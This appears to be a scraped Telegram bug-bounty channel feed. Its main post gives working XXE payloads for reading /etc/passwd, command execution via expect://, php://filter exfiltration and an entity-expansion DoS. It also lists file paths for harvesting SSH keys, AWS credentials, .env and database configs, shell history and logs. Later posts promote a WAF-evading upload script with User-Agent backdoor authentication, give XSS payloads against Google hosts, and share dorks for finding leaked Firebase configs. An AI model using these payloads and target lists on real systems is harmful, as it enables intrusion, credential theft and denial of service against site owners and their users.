๐ฅXXE to Remote Code Execution (RCE) โ Real-World Attack Chainโก
Hey Hunters,
DarkShadow hereโdropping a quick tip for your next XXE hunt!
Escalate XXE vulnerability ๐
1. Basic XXE Payload (Test Injection)
2. RCE via expect:// PHP Wrapper (if enabled)
Result: Executes id command and returns output.
Condition: expect must be compiled with PHP (very rare, but deadly).
3. Local File Read using php://filter
Output: Base64-encoded content of /etc/passwd. Decode it locally. (Effective to bypass WAF filters and got any outputs correct format)
4. XML Bomb (DoS)
Effect: Crashes or DoS the XML parser due to entity expansion.
5. Read User Private Keys (SSH)
๐Pro tip for more recon:
1. Steal AWS / Cloud Credentials via XXE
3. Bash History Abuse
5. Custom Internal Recon via /proc Files
Sometimes exposes secrets in memory or open database connections.
So guys what about my these methodology? If you guy's are really enjoyed, don't forget to show your love โค๏ธ
Don't forget to follow me ๐๐ผ DarkShadow
#bugbountytips #xxe
Hey Hunters,
DarkShadow hereโdropping a quick tip for your next XXE hunt!
Escalate XXE vulnerability ๐
1. Basic XXE Payload (Test Injection)
<?xml version="1.0"?>If the response contains /etc/passwd, the app is XXE vulnerable.
<!DOCTYPE root [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<root>&test;</root>
2. RCE via expect:// PHP Wrapper (if enabled)
<?xml version="1.0"?>๏ปฟ
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "expect://id">
]>
<root>&xxe;</root>
Result: Executes id command and returns output.
Condition: expect must be compiled with PHP (very rare, but deadly).
3. Local File Read using php://filter
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<foo>&xxe;</foo>
Output: Base64-encoded content of /etc/passwd. Decode it locally. (Effective to bypass WAF filters and got any outputs correct format)
4. XML Bomb (DoS)
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>
Effect: Crashes or DoS the XML parser due to entity expansion.
5. Read User Private Keys (SSH)
Useful Paths to Check:
/home/*/.ssh/id_rsa
/root/.ssh/id_rsa
/etc/ssh/ssh_config
/var/backups/
/proc/self/environ (for creds or keys in memory)
๐Pro tip for more recon:
1. Steal AWS / Cloud Credentials via XXE
Also check:2. Dump Configs for DB Creds or Secrets
/home/www-data/.aws/credentials
/proc/self/environ (might expose AWS keys, tokens)
Also check:
config.php
.env
db.php
settings.php
wp-config.php (WordPress)
phpmyadmin/config.inc.php (phpmyadmin)
administrator/.env (joomla)
config/services.yaml (Symfony Framework)
app/config.js, app/config.json (nodejs)
settings.py, config.py (Python / Django / Flask)
application.properties, application.yml, web.xml (Java / Spring Boot / JSP Apps)
database.yml (Ruby on Rails)
3. Bash History Abuse
Also check:4. Read Logs for Token Harvesting
.bash_history
Sometimes contains:
MySQL login
Admin tools
SSH commands
Clear-text passwords
Web Server Logs:
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error_log
PHP / App-Specific Logs:
/var/log/php_errors.log
/var/log/php8.1-fpm.log
/var/log/php7.4-fpm.log
/var/log/php5-fpm.log
/var/log/php-fpm/www-error.log
Laravel / Symfony / Framework Logs:
storage/logs/laravel.log
/var/www/html/storage/logs/laravel.log
/var/www/html/app/storage/logs/laravel.log
var/log/dev.log (Symfony)
app/logs/dev.log
Authentication / Session Logs
/var/log/auth.log
/var/log/secure
/var/log/faillog
/var/log/wtmp
/var/log/btmp
/var/log/lastlog
System Logs (May Contain Leaks or Stack Traces):
/var/log/syslog
/var/log/messages
/var/log/dmesg
/var/log/kern.log
Database Logs (If Exposed):
/var/log/mysql/error.log
/var/log/postgresql/postgresql.log
/var/log/mariadb/mariadb.log
5. Custom Internal Recon via /proc Files
Also check:
/proc/self/cmdline
/proc/self/fd/
Sometimes exposes secrets in memory or open database connections.
So guys what about my these methodology? If you guy's are really enjoyed, don't forget to show your love โค๏ธ
Don't forget to follow me ๐๐ผ DarkShadow
#bugbountytips #xxe
๐19โค15๐ฅ7๐คจ1๐ค1
Itโs lightweight, fast, and helps turn raw recon into insights.
Please open Telegram to view this post
VIEW IN TELEGRAM
โค10๐ฅ6๐4
Good Morning Everyone ๐ฅ ๐ฅ ๐ฅ ๐ฅ ๐ฅ
So how's everything going on?๐ฅ ๐
So how's everything going on?
Please open Telegram to view this post
VIEW IN TELEGRAM
โค14๐ฅ8
Hey Hunters,
DarkShadow here again. We all know how frustrating it is to test file upload vulnerabilitiesโsometimes the file uploads, but you canโt execute it because WAFs or IDS jump in.
So, Iโve built a next-level, compact script that actually bypasses most WAF and IDS protections. It uses 3 stealth techniques to evade restrictions and offers 2 output modes for flexibility.
What makes it even cooler?
Wanna try it out? drop a comment and let me know. And of course, follow me on X โ DarkShadow
#wafbypass
DarkShadow here again. We all know how frustrating it is to test file upload vulnerabilitiesโsometimes the file uploads, but you canโt execute it because WAFs or IDS jump in.
So, Iโve built a next-level, compact script that actually bypasses most WAF and IDS protections. It uses 3 stealth techniques to evade restrictions and offers 2 output modes for flexibility.
What makes it even cooler?
No password needed.
It uses a unique auth mechanism based on the User-Agent headerโno login form, no cookies, nothing else. If your User-Agent matches, youโre in. If not, the script wonโt even respond.
Wanna try it out? drop a comment and let me know. And of course, follow me on X โ DarkShadow
#wafbypass
๐ฑ8๐7โค6๐ฅ4๐ณ1๐ฟ1
Hey Hunter's,
DarkShadow here back again. Dropping a Google XSS POC1๐
โ POC steps:
a simple XSS payload as usual๐
The vulnerability has been patched๐ฅฑ
Don't forget to follow me ๐๐ผ DarkShadow
#xss #poc #googlebug
DarkShadow here back again. Dropping a Google XSS POC1๐
โ POC steps:
Vuln host: aihub.cloud.google.com
Vuln param: /url?q= (GET method)
Tecniq: double url encoding
Payload: "><svg/onload=alert(document.domain)>
a simple XSS payload as usual๐
The vulnerability has been patched๐ฅฑ
Don't forget to follow me ๐๐ผ DarkShadow
#xss #poc #googlebug
๐ฑ10๐7๐ฅ4๐ซก2๐ฟ1
โกWaybackLister is a reconnaissance tool that taps into the Wayback Machine to fetch historical URLs for a domain, parses unique paths, and checks if any of those paths currently expose directory listings. It's fast, multithreaded, and built for practical use in security assessments and bug bounty recon.
โ https://github.com/anmolksachan/wayBackLister
โ Join Telegram For More Content: t.iss.one/brutsecurity
----------------------------------------------------------
๐ Ready to Skill Up? Enroll Now โ wa.link/brutsecurity
#CyberSecurity #BugBounty #EthicalHacking #Infosec #BrutSecurity
โ https://github.com/anmolksachan/wayBackLister
โ Join Telegram For More Content: t.iss.one/brutsecurity
----------------------------------------------------------
๐ Ready to Skill Up? Enroll Now โ wa.link/brutsecurity
#CyberSecurity #BugBounty #EthicalHacking #Infosec #BrutSecurity
โค9๐7๐ฅ5
CVE-2025-27007: Privilege Escalation in OttoKit WordPress Plugin, 9.8 rating ๐ฅ
Errors in the logic of the plugin's API could potentially lead to an attacker gaining access to the administrator account. According to Patchstack, exploitation of the vulnerability began just an hour after public disclosure!
Search at Netlas.io:
๐ Link: https://nt.ls/y4FXX
๐ Dork: http.body:"plugins/suretriggers"
Read more: https://patchstack.com/database/wordpress/plugin/suretriggers/vulnerability/wordpress-suretriggers-1-0-82-privilege-escalation-vulnerability?_s_id=cve
Errors in the logic of the plugin's API could potentially lead to an attacker gaining access to the administrator account. According to Patchstack, exploitation of the vulnerability began just an hour after public disclosure!
Search at Netlas.io:
๐ Link: https://nt.ls/y4FXX
๐ Dork: http.body:"plugins/suretriggers"
Read more: https://patchstack.com/database/wordpress/plugin/suretriggers/vulnerability/wordpress-suretriggers-1-0-82-privilege-escalation-vulnerability?_s_id=cve
๐14
Good morning hackers ๐ฅฑ
Need more Google bug POC's? ๐
ใ ค
Need more Google bug POC's? ๐
ใ ค
๐33๐ฅ8๐2๐ค2
๐ฅSensitive informations leaks vai fofa Dorking ๐ฅ
Hey Hunter's, DarkShadow back again dropping a simple and effective dork.
Fofa query:
If you guy's really enjoy to read my methodology's don't forget to follow me ๐๐ผ DarkShadow
#dork #bugbountytips
Hey Hunter's, DarkShadow back again dropping a simple and effective dork.
Leaking firebase configurations๐Fofa query:
body="firebaseapp" && domain="example.com"
Or
(body="firebaseapp" || body="firebaseconfig") && host=".target_domain_name_only"
If you guy's really enjoy to read my methodology's don't forget to follow me ๐๐ผ DarkShadow
#dork #bugbountytips
๐ฟ8๐6โค4
Brut Security
๐ฅSensitive informations leaks vai fofa Dorking ๐ฅ Hey Hunter's, DarkShadow back again dropping a simple and effective dork. Leaking firebase configurations๐ Fofa query: body="firebaseapp" && domain="example.com" Or (body="firebaseapp" || body="firebaseconfig")โฆ
Guy's read this hackerone report to know how to exploit further using this sensitive informations.
https://hackerone.com/reports/1447751
https://hackerone.com/reports/1447751
๐10
Hey Hunter's,
Dark Shadow here back again. Dropping a Google XSS POC-2๐
โ POC steps:
A simple payload can flip the game if you are use it in right place.๐
The vulnerability has been patched๐ฅฑ
Let me knowโarenโt you all interested to know that Google rewarded $31,337 for an SSRF vulnerability?
And
Don't forget to follow me ๐๐ผ DarkShadow
#xss #googlebug
Dark Shadow here back again. Dropping a Google XSS POC-2๐
โ POC steps:
โขVuln host: books.google.com
โขXss type: stored based XSS
โขVuln param: book name title and publisher name parameter.
โขTechnique: direct inject the payload. Without any kind of encoding. (Reason: no input sanitization)
Payload: "><svg/onload=prompt(1)>
A simple payload can flip the game if you are use it in right place.๐
The vulnerability has been patched๐ฅฑ
Let me knowโarenโt you all interested to know that Google rewarded $31,337 for an SSRF vulnerability?
And
Don't forget to follow me ๐๐ผ DarkShadow
#xss #googlebug
๐ฅ23๐ฟ8๐4โค2๐ณ2